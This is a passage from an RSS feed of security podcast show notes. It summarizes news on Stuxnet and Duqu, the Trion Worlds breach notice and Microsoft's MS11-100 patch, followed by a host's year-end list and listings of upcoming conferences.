	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When a machine becomes infected with Duqu or Stuxnet, the shared components on the platform search for two unique registry keys on the PC linked to Duqu and Stuxnet that are then used to load the main piece of malware onto the computer, he said.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky recently discovered new shared components that search for at least three other unique registry keys, which suggests that the developers of Stuxnet and Duqu also built at least three other pieces of malware using the same platform, he added.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.trionworlds.com/en/games/account-notification"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.trionworlds.com/en/games/account-notification</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://pc.gamespy.com/pc/heroes-of-telara/1215450p1.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pc.gamespy.com/pc/heroes-of-telara/1215450p1.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">IMPORTANT NOTIFICATION CONCERNING YOUR TRION WORLDS ACCOUNT</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We recently discovered that unauthorized intruders gained access to a Trion Worlds account database.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The database in question contained information including user names, encrypted passwords, dates of birth, email addresses, billing addresses, and the first and last four digits and expiration dates of customer credit cards.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There is no evidence, and we have no reason to believe, that full credit card information was accessed or compromised in any way. We have already taken further action to strengthen our systems, even as we, with external security experts, continue to research the extent of the unauthorized access.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You will notice on your next log in to our website that you will be required to change your password, and existing Mobile Authenticator users will also need to reconnect their Authenticator. When you log in, you will be prompted to provide a new password, security questions and answers, and be given the option to connect your account to our Mobile Authenticator to enhance your account&rsquo;s security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If you have used your username and password for other accounts, especially financial accounts or accounts with personal information, we suggest you change your passwords on those accounts as well. We recommend that you carefully review your statements, account activity, and credit reports to help protect the security of those accounts. If you need information on how to obtain your credit report or believe any such accounts have been breached, please </span><a href="http://www.trionworlds.com/en/games/account-notification.php#additionalinformation"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">see below</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for more information.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You should have continued, uninterrupted access to RIFT, and we do not anticipate any disruptions to your playing time.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nevertheless, if you own the RIFT game, you will be granted three (3) days of complimentary RIFT game time once you update your password and security questions.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Additionally, once you update your account and set a new password, your account will be granted a Moneybags&rsquo; Purse, which increases your looted coin by 10%, even if you have not yet purchased RIFT.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please log in to </span><a href="https://rift.trionworlds.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://rift.trionworlds.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (and we recommend that you copy and paste this link into your browser to access the site) to update your password, security questions and Authenticator.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We apologize for any inconvenience this may have caused you. If you have further questions, please visit our website,</span><a href="http://www.trionworlds.com/en/games/account-notification-faq.php"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.trionworlds.com/AccountNotificationFAQ</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ADDITIONAL INFORMATION</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To protect against possible identity theft or other financial loss, we encourage you to remain vigilant, to review your account statements and to monitor your credit reports. Provided below are the names and contact information for the three major U.S. credit bureaus and additional information about steps you may take to obtain a free credit report and/or place a security freeze on your credit report. If you believe those accounts may have been breached or that your identity may have been stolen, you should contact law enforcement, including the Federal Trade Commission. If you believe you are the victim of identity theft, you also have right to file a police report and obtain a copy of it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://blogs.technet.com/b/msrc/archive/2011/12/29/microsoft-releases-ms11-100-for-security-advisory-2659883.aspx?Redirected=true"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://blogs.technet.com/b/msrc/archive/2011/12/29/microsoft-releases-ms11-100-for-security-advisory-2659883.aspx?Redirected=true</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today we released Security Update</span><a href="http://technet.microsoft.com/en-us/security/bulletin/ms11-100"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">MS11-100</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to address the issue described in</span><a href="http://technet.microsoft.com/en-us/security/advisory/2659883"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Security Advisory 2659883</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The security update has a severity rating of Critical and resolves a publicly disclosed remote unauthenticated Denial of Service issue in ASP.NET versions 1.1 and above on all supported versions of .NET Framework. Of note, the new method of hash collision attacks used to exploit this vulnerability is an industry-wide issue affecting various Web platforms, including ASP.NET.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While we have seen no attacks attempting to exploit this vulnerability, we encourage affected customers to test and deploy the update as soon as possible. Consumers are not vulnerable unless they are running a Web server from their computer. More technical details can be found at the Security Research &amp; Defense Blog.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Karthik&rsquo;s Top 5:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. Driving Cross Country</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> While this isn&rsquo;t security related at all, it should still figure in the Top 5 for the year. Moving from California to North Carolina, especially with a damaged door, was a great experience. It was a very very long drive, but I guess it was kinda worth it because now I spend ~10 hours lesser in flights, every trip&#8230;unless I travel to the west.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. Rejoining ISD Podcast</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I wasn&rsquo;t a regular crew member on the podcast for a while, thanks to Georgia Tech, and then my visit to India. Not being on the podcast felt weird, and felt like I wasn&rsquo;t doing something right. Getting back to it in January once I started my job in California felt good, and I&rsquo;ve been on ever since. Its been a great experience recording in the absence of Rick (or sometimes in his presence, as well), and as always, I learn new things everyday</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> 3. Being a Security Consultant</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> As I am sure Rick will agree, being a security consultant has a few perks (and quite a few downsides too). It gave me a lot of exposure into work that I&rsquo;d never done before, gave me a lot of airline miles, and more importantly, taught me a whole lot about penetration testing, and what goes behind it. Before taking up the job, it was what I had studied in books, or read in articles, but doing the job itself was very rewarding</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. Live Podcasts</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&rsquo;ve done live podcasts before, where people at a particular conference join us and talk aout what&rsquo;s happening there. That changed a little this year, where we were at security conferences and did live podcasts from there. It was easily one of the biggest highlights of the year, and gave a new dimension to the podcasts. I still remember the introduction show at Defcon, the snoring show at Derbycon, and the more recent ISD/EL crossover at BSides ATL.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">1. Speaking at Derbycon</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I guess this is one thing I have in common with both Boris&rsquo; and Rick&rsquo;s lists. I would have said Geordy&rsquo;s, but he wasn&rsquo;t there, so I doubt it will appear. Speaking at Derbycon was a huge learning experience, not just in terms of speaking in front of a very well informed crowd, but also in terms of writing most of the tool in Panera Bread two hours before the talk. While it wasn&rsquo;t my first talk at a security conference (there was that quick fire talk at ShoeCon, and a talk attended by 7 people at BSides ATL 2010), it was definitely something I will remember for a long time, and maybe a few years later when DerbyCon becomes as big as Schmoocon, I will point at my speaker badge and say &ldquo;Yeah, I spoke there in the first ever edition.&rdquo;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-555-subpoena-leak-dont-fear-the-reaver-stuxnet-cousins-trion-ms11-100-karthiks-top-5/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3313/0/infosec-daily-podcast-episode-555.mp3" length="21048360" type="audio/mpeg" />
		<itunes:duration>0:43:48</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 555 for December 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 555 for December 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Geordy Rostad.
	&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: http://mashable.com/2011/12/28/leaked-twitter-subpoena-raises-online-privacy-issues/
	The leaked subpoena sent to Twitter this month by the Suffolk District Attorney&#39;s Office in Boston is causing some hoopla on the web and raising the issue of law enforcement&#39;s access to online personal data. On Dec. 14, the D.A.&#39;s Office issued a subpoena to Twitter in order to access the account information of two users who tweeted a list of personal information they allegedly obtained by hacking into the Boston Police Patrolmens&#39; Association. The hackers stole identifying information and Tweeted it to followers. The subpoena requests &#34;available subscriber information, for the account or accounts associated with the following information, including IP address logs for account creation.&#34;
	In the subpoena, assistant D.A. Benjamin A. Goldberger requests that the investigation be kept from the Twitter users as to not impede the ongoing probe. But the information was leaked. We reached out to Twitter for comment, but have yet to hear back.
	On Dec. 23 one of the accounts under investigation, @p0isAn0N Tweeted, &#34;Haha. Boston PD submitted to Twitter for my information. Lololol? For what? Posting info pulled from public domains? #comeatmebro.&#34;
	The D.A.&#39;s office requested details of two Twitter users and also listed the name Guido Fawkes, which is the name but not handle listed for one of the accounts under investigation, as well as the hashtags #BostonPD and #d0xcak3.
	One of the accounts being probed is listed in the subpoena as @OccupyBoston, however that account appears to be inactive. It&#39;s likely they meant @Occupy_Boston, which Tweets about the occupy movement. Targeting this account has lead some to speculate that the police are monitoring the online activity of occupy protestors.
	Twitter&#39;s website contains an informat[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 554 &#8211; Pentesting Lessons, Twitter Suite, Hidden Dragon, Stratfor Again, Facebook 911, Cuckoo &amp; Boris’ Top 5</title>
		<link>http://www.isdpodcast.com/episode-554-pentesting-lessons-twitter-suite-hidden-dragon-stratfor-again-facebook-911-cuckoo-boris-top-5</link>
		<comments>http://www.isdpodcast.com/episode-554-pentesting-lessons-twitter-suite-hidden-dragon-stratfor-again-facebook-911-cuckoo-boris-top-5#comments</comments>
		<pubDate>Thu, 29 Dec 2011 02:21:32 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3309</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 554 for December 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad. &#160; Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 554 for December 28, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
